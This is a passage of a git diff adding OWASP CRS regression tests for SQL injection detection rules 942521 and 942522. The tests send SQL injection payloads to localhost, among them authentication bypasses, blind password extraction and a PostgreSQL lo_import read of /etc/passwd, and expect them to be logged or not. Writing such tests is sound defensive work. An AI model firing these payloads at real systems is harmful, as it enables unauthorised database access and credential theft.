%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20datab
ases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-17 + desc: "Performance test" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: 
"var=%21%21%21%21%21%27...%22%21%21%27.%22.%60...%27.....%27%40%60%21%21%21%21%21%60....%22%40%40%40%40%40%60%21%21%21%21%21%27%40%60%40%40%40%40%40%27...%22%27%40%40%40%40%40%27%22...%27%21%21%21%60%21%21%60%40%40%22%27%40%40%60..%27%21%21%27%40%40%40%40%22%40%40%40%40%40%60%21%21%21%21%27%21%22%40%40%40%40%40%27%21%21%21%60%21%21%21%21%22%21%21%21%22%21%21%21%21%21%27....%27%27%40%27%22.%60%40%40%40%40%60%27%21%21%22%40%60%40%40%40%40%27%21%27%21%27.....%27%21%21%21%60%40%40%40%60.%27%21%21%60%21%27%21%21%21%60%21%21%21%21%21%60%22%40%60%40%40%40%60%21%21%21%27%40%60%40%40%40%40%22...%22%21%21%21%21%21%27%40%40%40%27%21%27.....%27%21%21%21%27....%60%40%40%40%60%40%22...%60...%27%40%40%40%40%40%60...%22%40%40%40%40%22..%22%40%40%40%60%60%21%22%40%40%40%22%40%40%40%22%40%40%40%22..%22%27....%60%21%21%27%40%22...%27%40%40%40%40%22%40%40%40%22%21%21%21%21%21%27...%60...%22%21%21%21%21%60%40%40%40%27%21%27%40%40%40%40%40%22%40%40%40%60.....%22....%22%27....%22%22%21%21%21%21%22%40%40%27%21%21%21%21%21%22....%27%21%21%21%21%21%22%21%21%21%60%40%40%40%40%22%40%22%40%40%40%27%40%40%40%40%40%22%21%21%21%21%21%22%60%21%21%21%21%22%40%40%40%40%27%60%60%60..%22...%22%21%21%21%27%21%60%22%40%40%40%60%21%21%21%60%22%40%40%40%40%27%27%60%40%40%40%40%22.....%27%27..%22%40%40%40%22%21%21%21%21%60%40%40%40%40%40%27%21%21%21%21%22.%60%40%40%40%40%40%60%60%21%21%60%21%21%21%21%22%21%21%22.%60%27%40%40%27%40%40%40%60%21%21%21%21%21%22%21%21%21%21%21%27%40%40%40%40%27%21%21%21%21%21%60%40%40%40%40%40%22.....%60%60.%22%40%40%22.%27%21%21%21%21%21%27%21%21%27%40%40%40%22%60.....%60%40%40%27%22%40%40%40%40%60%27%22%40%40%40%40%60%21%21%21%21%27%22%21%21%21%21%60%21%60%40%40%40%40%22%40%40%40%40%22%21%21%22%21%21%21%21%21%27%40%40%22...%60%22%27.%60%22%40%22%40%40%40%40%40%22%21%21%22%21%21%21%21%22%40%40%40%60%40%40%27%21%21%22.....%60%21%21%21%60%40%40%22%40%60%40%40%40%60%27....%27%40%40%40%22%60%40%40%40%40%40%60%60%21%21%22%40%22..%27%21%21%21%21%21%60%40%40%40%40%27....%22.....%27%60
%21%21%21%27%21%22%40%60%60%27%60%27%40%27%40%40%40%40%27%21%21%27%40%40%60%21%22%60%21%21%21%27..%22%27%40%40%40%60%60.....%27.....%27%40%40%22%22%27.....%22.%60%21%60%40%40%60%21%60%40%40%40%40%27%40%40%40%27%22..%60%21%60%40%40%40%60%60%40%40%40%40%22%21%21%21%21%21%22.%60%21%21%27%60%40%40%40%40%60%40%40%40%40%40%27%22.%22...%27...%27.....%27%40%40%40%40%40%60.%27%40%40%40%27%21%21%21%21%21%22%40%22%40%60%27%21%21%21%27%40%27%40%40%40%40%60%40%40%40%40%60%27%40%40%40%40%40%60%21%21%21%60%40%40%22...%60..%27.....%27.%27%27%21%60.%22%22%21%21%21%27.....%22%40%40%40%22%40%40%40%40%40%60...%27.%60%22..%27%21%60%21%21%21%21%60..%60....%22%27%40%40%40%40%22..%27.%27....%27%40%40%60...%22%21%22%22%21%60%21%21%21%21%21%27%21%21%27%22%27....%27%22%21%21%21%27%40%40%40%27.....%22...%60..%60%40%40%40%40%40%60%22%40%40%60.%27%21%27%21%21%21%21%21%27....%60%21%21%21%27%21%27%40%60%60...%22%21%21%21%21%60%27%40%22%22%40%22...%60%40%40%27..%22%21%21%21%21%60..%27%40%40%27%40%40%27..%22%40%40%40%40%60....%60%40%40%40%60%40%40%40%40%60%22%21%21%21%60%21%60%40%40%40%22..%27%40%40%40%60%40%40%60%60%22%40%40%40%40%22%21%21%60%40%40%22%40%60%21%21%60%27.....%27%40%40%40%40%40%22.%60%21%21%21%21%60%21%21%60.....%22%21%21%27%27%21%22%40%40%40%27%27%22%40%40%40%40%60....%60%22.%27%21%21%21%27%40%40%40%40%60...%27..%60%21%21%60...%60%21%60%40%40%27.....%27%40%40%27%27%40%40%27..%27.%27%40%22%27%21%22%40%40%22%21%21%21%27%60.....%60.....%22.%60%40%60%40%40%40%60..%22.....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%40%40%22%40%40%40%40%40%27....%60.%27....%27%21%21%21%60%21%21%21%21%21%60..%27.%27%40%40%22%60%40%40%40%60.....%27...%27%21%21%21%21%60..%60....%60%40%40%40%27%21%21%21%27%60%21%21%21%21%27...%60%40%40%40%60....%60%27%40%40%40%40%27%40%40%60..%27%40%40%27..%27%22%21%22%40%40%40%27...%22%21%21%21%21%21%60%40%40%40%40%40%22%40%40%40%40%22%60%21%27..%60%21%21%21%27%40%40%40%22%21%21%21%21%27%40%40%40%40%22%40%60%22.....%22.....%27%40%40%40%40%40%27%21%21%21%21%27%40%27%40%40%40
%40%40%27%60%27%22%21%22%21%21%21%21%60%40%40%40%40%40%27..%22.%60%40%40%40%40%40%22.%60%60%21%21%21%21%21%60%21%21%21%22...%60%40%22%21%21%21%21%22%21%21%60%40%40%40%40%60%21%21%21%21%22%40%27%21%21%21%60%27%40%40%40%40%22.....%60....%22...%60%21%21%21%21%60%21%21%21%21%21%27%40%40%60%40%40%40%40%27%40%60%21%22.....%22%21%21%21%27%40%40%40%40%27....%22%40%40%40%40%40%60%40%27.....%22%21%21%21%60%40%40%60%21%21%21%21%21%22%60%40%40%40%40%27%21%21%21%22...%60%40%60...%27...%60%21%21%21%22%21%21%21%21%27%21%27%21%21%60.%60%21%21%60..%22..%60.....%22..%22....%27%21%21%21%21%27%60%40%40%40%40%40%22%21%21%21%21%22%40%40%40%40%40%27%40%40%40%40%40%60.%60....%60%60%40%40%40%40%22%27%40%27%40%60%21%21%21%21%21%27...%27%40%40%40%40%40%27.%27.....%60%21%21%60%21%21%21%21%21%22%22%40%40%40%27%40%60%21%21%21%22%21%21%21%21%21%27..%22....%27%21%21%21%21%21%27...%60.....%60%40%22%21%21%21%21%27%27%21%21%21%21%21%22%60%27%21%21%21%27..%60%40%60%21%21%21%21%21%27%60%27%21%21%27%21%21%21%60%21%21%21%21%27%40%60%22%21%60.....%27%40%40%40%40%40%27.....%60%21%21%60%40%40%40%27...%60%21%21%21%60%40%40%40%22%22%21%21%21%21%21%22%40%40%40%40%27%40%22.%22.%22%40%40%40%40%40%22%40%60....%60....%27%21%21%21%21%21%22%21%21%21%21%60%21%21%21%21%21%27....%27%21%21%21%21%60%22%60%40%40%40%40%40%60...%22%40%60%40%40%22%40%40%40%40%40%27%21%21%27%22%40%40%60%27%22%40%40%40%22%21%60%27%21%21%21%21%21%60...%27%40%40%22%21%21%21%27%21%27%21%21%21%60%21%21%21%21%21%60%22.....%22%21%21%21%21%27%40%40%40%40%60%21%21%27.....%22%21%21%21%22%21%21%22%21%21%22%40%40%27%21%21%21%21%22%40%40%40%40%27%40%40%40%40%27....%60%40%40%40%60%40%22...%27.....%27%40%40%22%40%40%40%22%21%21%21%21%21%22...%27..%22%21%22%40%40%40%40%40%27....%60%40%40%40%40%22%27%21%21%21%21%21%60%40%40%22%27%40%40%40%40%40%60%21%21%21%27%40%40%40%27%60.%27%21%21%21%22....%60%40%27.....%22%40%40%40%40%40%27%40%60%40%40%40%40%60%40%40%40%60%21%21%21%21%21%60%27%21%21%21%27....%22%22%21%21%27...%27%21%21%21%27...%27%40%22....%22%40%40%27%21
%21%21%21%27.....%22%40%40%40%40%27%22....%22...%27%21%21%21%60....%22%40%40%40%22...%27%40%27..%60%21%21%27%40%40%40%40%40%60%40%60%21%21%21%21%21%27.....%60%27%22%22%27%27.%22%60%21%21%22%40%40%60%21%22%60%21%21%27..%60%21%21%21%21%60%21%21%21%21%21%60%40%40%22%21%21%21%21%21%60%40%40%60....%60%40%40%40%40%40%22%40%40%40%40%60.....%60%27%27...%27%22%22%40%40%60.....%22%22%27%40%60%27%27.....%22%40%27%60.....%60%40%22%40%40%40%40%27%21%21%21%21%60%40%40%40%27%40%40%40%40%40%22%21%21%21%21%60.%22%21%21%27%40%27%22%21%21%21%21%60%40%40%27%40%40%40%40%27%21%21%27%27..%27%27%21%21%21%21%21%27%40%27.%60%21%21%21%21%21%27%40%40%40%40%27%21%21%27%40%40%40%40%22...%22%60%27%40%40%40%22%40%40%40%22%22%21%21%21%22%21%21%60...%27.....%60%40%40%40%60%21%21%21%60%40%40%40%40%40%22%22%21%21%21%60%21%21%21%21%21%27%27%21%21%21%21%22....%27%21%21%21%21%21%27%21%21%21%22%21%21%21%21%21%27%22....%60%27%40%40%27%21%27.....%22%21%22%21%21%21%21%21%22%21%21%21%21%22...%27%22%40%40%40%60%40%40%40%40%40%27%27%21%21%27....%22.....%22%21%21%21%22%40%40%40%40%40%27%21%21%21%21%60%22.....%60..%60%22%21%21%21%22%22%27...%27%40%40%40%40%27.....%27%21%21%21%60...%27.%22%21%21%21%21%21%27%21%27%21%21%21%22%40%27.....%27%21%21%21%21%22%40%27...%27%21%21%27%40%40%22%40%40%40%40%40%60..%27%21%27.....%22%22%21%21%21%21%21%27%40%40%40%40%22%40%40%40%60.....%60%21%21%21%21%21%27....%27%27%40%40%40%40%27.....%27%21%60....%22...%22%21%21%21%21%27%21%21%22%40%27%40%40%40%40%40%27%21%21%21%22%21%21%21%21%27%21%21%21%21%60%27%27..%22%22%21%21%21%27%22%21%60..%22%27%27%60..%22%21%22%21%21%21%21%21%27..%27..%27.%27%27%21%21%21%21%60%27%21%21%21%21%60..%27%21%21%22.....%22%21%21%21%21%27%21%21%21%27....%60.....%22...%22%22%22.%22%27.%60%21%21%21%21%22%60%40%22.....%27%21%21%21%21%22%40%60...%22.%22.....%27%27..%22%27%21%21%21%21%21%60....%22%21%21%21%22..%60%21%21%21%21%60%21%21%21%21%27....%60%27%40%40%40%22%27.%27....%22%40%40%40%60%21%21%21%21%22%40%40%40%40%40%27%21%21%21%60%40%40%40%40%60.%22..%22%40%40%
22%21%60%22%21%21%21%21%27%27%27.%27%22%40%40%40%22%40%40%40%27....%22%21%21%21%21%21%22%21%21%21%21%22%21%27%60%27%21%21%21%60%21%27...%60%21%21%21%21%27...%27%40%40%40%40%40%60%21%21%60%21%21%21%22%40%60%40%40%40%40%40%60%27%60..%22%22%21%21%27%22%40%40%27...%22..%22....%22%27%60%40%40%27....%27%40%40%40%40%22%60%21%21%60.%60%40%27%21%60%21%22...%27...%27.....%27%21%21%22..%22%22%40%27%21%21%21%27%40%40%22.%27%21%21%21%60%40%60%60%21%21%21%60%21%21%22...%27.%22%21%21%21%27...%22%21%21%21%21%60%40%40%40%40%60%22.%27%21%21%60.....%60%21%21%60%21%21%21%21%21%27.%27%40%40%40%40%40%22%21%21%21%60..%27%21%21%21%21%21%27%21%21%60%40%40%27%21%21%21%27.%22%21%21%21%21%22.%22%40%40%40%40%40%22%21%21%21%22%21%21%22%22%21%21%21%60%27%21%21%60%40%40%40%40%40%27..%27%40%60.....%22%21%21%21%27.%27%21%21%21%21%27%27....%22%40%40%27%40%40%40%40%40%60%60or" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-18 + desc: "Performance test" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: 
"var='.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'
.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-19 + desc: "Negative test: performance test" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'
.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'or" + version: HTTP/1.0 + output: + no_log_contains: id "942521" + - test_title: 942521-20 + desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-21 + desc: "Detects odd number of quotes in request headers" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and starts_with(password) and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942521" + - test_title: 942521-22 + desc: "Detects odd number of quotes in request headers" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and lo_import('/etc' || '/pass' || 'wd')::int::bool and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: 
+ log_contains: id "942521"
+ - test_title: 942521-23
+ desc: "Detects odd number of quotes in request headers"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "1' and lo_get(16400)::text::bool and 'true"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ version: HTTP/1.0
+ output:
+ log_contains: id "942521"
+ - test_title: 942521-24
+ desc: "Detects odd number of quotes in request headers"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "1'and json_search (json_array(password),0b11000010110110001101100,'t_______________')#"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ version: HTTP/1.0
+ output:
+ log_contains: id "942521"
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml
new file mode 100644
index 00000000..92b56991
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml
@@ -0,0 +1,154 @@ +--- +meta: + author: "terjanq, Franziska Bühler" + description: "Detects basic SQL authentication bypass attempts 4.1/4" + enabled: true + name: 942522.yaml +tests: + - test_title: 942522-1 + desc: "Blocks bypass with escaped quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # \'or'1 + data: "var=%5C'or'1" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_title: 942522-2 + desc: "Blocks bypass with escaped quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # \"or"1 + data: "var=%5C%22or%221" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_title: 942522-3 + desc: "Blocks bypass with escaped quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # \`or`1 + data: "var=%5C%60or%601" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_title: 942522-4 + desc: "Blocks bypass with: \\'and" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=%5C'and" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_title: 942522-5 + desc: "Negative test: doesn't block normal SQLi" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 
User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var='or'1" + version: HTTP/1.0 + output: + no_log_contains: id "942522" + - test_title: 942522-6 + desc: "Negative test: doesn't block escaped quotes without following (and|or)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=%5C' foo or" + version: HTTP/1.0 + output: + no_log_contains: id "942522" + - test_title: 942522-7 + desc: "New line bypass" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=newline%0A%5C' and 1" + version: HTTP/1.0 + output: + log_contains: id "942522" + - test_title: 942522-8 + desc: "Negative test: Wikipedia article about SQLi" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: 
"var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'